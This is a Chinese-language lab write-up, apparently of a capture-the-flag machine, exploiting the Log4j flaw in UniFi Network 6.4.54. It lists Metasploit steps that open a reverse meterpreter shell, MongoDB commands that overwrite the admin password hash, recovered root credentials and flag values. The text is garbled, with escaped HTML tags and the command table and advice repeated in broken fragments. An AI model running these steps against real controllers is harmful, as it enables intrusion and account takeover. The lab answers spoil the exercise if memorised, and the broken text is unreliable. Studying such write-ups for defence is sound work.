UniFi网络设备漏洞利用与分析教学文档<\/h1>

1. 目标识别与端口扫描<\/h2>

首先使用Nmap对目标进行扫描，识别开放的端口和服务：<\/p>

nmap -sC -sV -v 10.129.104.207
<\/span><\/span><\/code><\/pre>扫描结果显示以下四个开放端口：<\/p>

22: SSH服务<\/li>
6789: 未知服务<\/li>
8080: HTTP服务<\/li>
8443: HTTPS服务（运行UniFi Network软件）<\/li>
<\/ul>
2. UniFi Network软件识别<\/h2>
访问8443端口发现运行的是UniFi Network软件，通过8080端口可以获取版本信息：<\/p>

软件名称：UniFi Network<\/li>
版本号：6.4.54<\/li>
<\/ul>
3. 漏洞识别<\/h2>
该版本存在已知漏洞：<\/p>

CVE编号：CVE-2021-44228（Log4j远程代码执行漏洞）<\/li>
漏洞类型：JNDI注入<\/li>
<\/ul>
4. JNDI注入攻击原理<\/h2>
JNDI（Java Naming and Directory Interface）注入利用：<\/p>

利用协议：LDAP（轻量级目录访问协议）<\/li>
默认端口：389<\/li>
工作原理：通过调用JNDI API，应用程序可以定位资源和其他程序对象，攻击者可以构造恶意LDAP查询实现远程代码执行<\/li>
<\/ul>
5. 攻击实施与流量监控<\/h2>
攻击工具准备<\/h3>

使用tcpdump监控LDAP流量：<\/li>
<\/ol>
tcpdump -i tun0 port 389<\/span>
<\/span><\/span><\/code><\/pre>
使用Metasploit框架构建攻击载荷：<\/li>
<\/ol>
msfconsole
<\/span><\/span>search log4j
<\/span><\/span>use 2<\/span>
<\/span><\/span>set rhosts 10.129.231.63
<\/span><\/span>set srvhost tun0
<\/span><\/span>set lhost tun0
<\/span><\/span>check
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>会话提升<\/h3>
Ctrl+Z
<\/span><\/span>search shell_to
<\/span><\/span>use 0<\/span>
<\/span><\/span>sessions -l
<\/span><\/span>set session 1<\/span>
<\/span><\/span>run
<\/span><\/span>sessions -i 2<\/span>
<\/span><\/span>meterpreter> shell
<\/span><\/span><\/code><\/pre>6. MongoDB服务分析<\/h2>
服务识别<\/h3>
ps aux|grep mongo
<\/span><\/span><\/code><\/pre>发现MongoDB运行在27117端口<\/p>
UniFi默认数据库<\/h3>

默认数据库名称：ace<\/li>
<\/ul>
MongoDB用户操作<\/h3>

枚举用户：<\/li>
<\/ol>
mongo --port 27117<\/span> ace --eval "db.admin.find().forEach(printjson);"<\/span>
<\/span><\/span><\/code><\/pre>
更新用户密码（使用SHA-512哈希）：<\/li>
<\/ol>
mkpasswd -m sha-512 s-h4ck13
<\/span><\/span>mongo --port 27117<\/span> ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$i2Bx4z4kMsLW5K2Y$2chqfNY\/6YEqDvBjk4GEJKsZlh39tfdr73boSEI2RKzhLkfP.g.YRIvY2OQr1RESU3D2eIl\/5A3cmZy5L2cKp\/"}})'<\/span>
<\/span><\/span><\/code><\/pre>7. 权限提升与凭证获取<\/h2>
UniFi管理员凭据<\/h3>

用户名：administrator<\/li>
密码：s-h4ck13<\/li>
<\/ul>
SSH root凭据<\/h3>
在UniFi管理界面Settings->Site选项卡下找到：<\/p>

用户名：root<\/li>
密码：NotACrackablePassword4U2022<\/li>
<\/ul>
8. 标志获取<\/h2>
用户标志<\/h3>
find \/ -name user.txt
<\/span><\/span>cat \/home\/michael\/user.txt
<\/span><\/span><\/code><\/pre>用户标志：6ced1a6a89e666c0620cdb10262ba127<\/p>
root标志<\/h3>
root标志：e50bc93c75b634e4b272d2f771c33681<\/p>
关键命令总结<\/h2>



功能<\/th>
命令<\/th>
<\/tr>
<\/thead>


端口扫描<\/td>
nmap -sC -sV -v <IP><\/code><\/td>
<\/tr>

LDAP流量监控<\/td>
tcpdump -i tun0 port 389<\/code><\/td>
<\/tr>

MongoDB用户枚举<\/td>
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"<\/code><\/td>
<\/tr>

MongoDB用户更新<\/td>
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<hash>"}})'<\/code><\/td>
<\/tr>

密码哈希生成<\/td>
mkpasswd -m sha-512 <password><\/code><\/td>
<\/tr>
<\/tbody>
<\/table>
安全建议<\/h2>

及时更新UniFi Network软件到最新版本<\/li>
禁用不必要的JNDI查找功能<\/li>
限制MongoDB的远程访问<\/li>
使用强密码策略，避免使用默认凭证<\/li>
实施网络分段，限制对管理界面的访问<\/li>
<\/ol>

功能<\/th>	命令<\/th> <\/tr> <\/thead>
端口扫描<\/td>	`nmap -sC -sV -v <IP><\/code><\/td> <\/tr>`
LDAP流量监控<\/td>	`tcpdump -i tun0 port 389<\/code><\/td> <\/tr>`
MongoDB用户枚举<\/td>	`mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"<\/code><\/td> <\/tr>`
MongoDB用户更新<\/td>	`mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"<hash>"}})'<\/code><\/td> <\/tr>`
密码哈希生成<\/td>	`mkpasswd -m sha-512 <password><\/code><\/td> <\/tr> <\/tbody> <\/table> 安全建议<\/h2> 及时更新UniFi Network软件到最新版本<\/li> 禁用不必要的JNDI查找功能<\/li> 限制MongoDB的远程访问<\/li> 使用强密码策略，避免使用默认凭证<\/li> 实施网络分段，限制对管理界面的访问<\/li> <\/ol>`

UniFi网络设备漏洞利用与分析教学文档<\/h1>

5. 攻击实施与流量监控<\/h2>

6. MongoDB服务分析<\/h2>

7. 权限提升与凭证获取<\/h2>

8. 标志获取<\/h2>

root标志<\/h3> root标志：e50bc93c75b634e4b272d2f771c33681<\/p>

安全建议<\/h2> 及时更新UniFi Network软件到最新版本<\/li> 禁用不必要的JNDI查找功能<\/li> 限制MongoDB的远程访问<\/li> 使用强密码策略，避免使用默认凭证<\/li> 实施网络分段，限制对管理界面的访问<\/li> <\/ol>

root标志<\/h3>
root标志：e50bc93c75b634e4b272d2f771c33681<\/p>

安全建议<\/h2>

及时更新UniFi Network软件到最新版本<\/li>
禁用不必要的JNDI查找功能<\/li>
限制MongoDB的远程访问<\/li>
使用强密码策略，避免使用默认凭证<\/li>
实施网络分段，限制对管理界面的访问<\/li> <\/ol>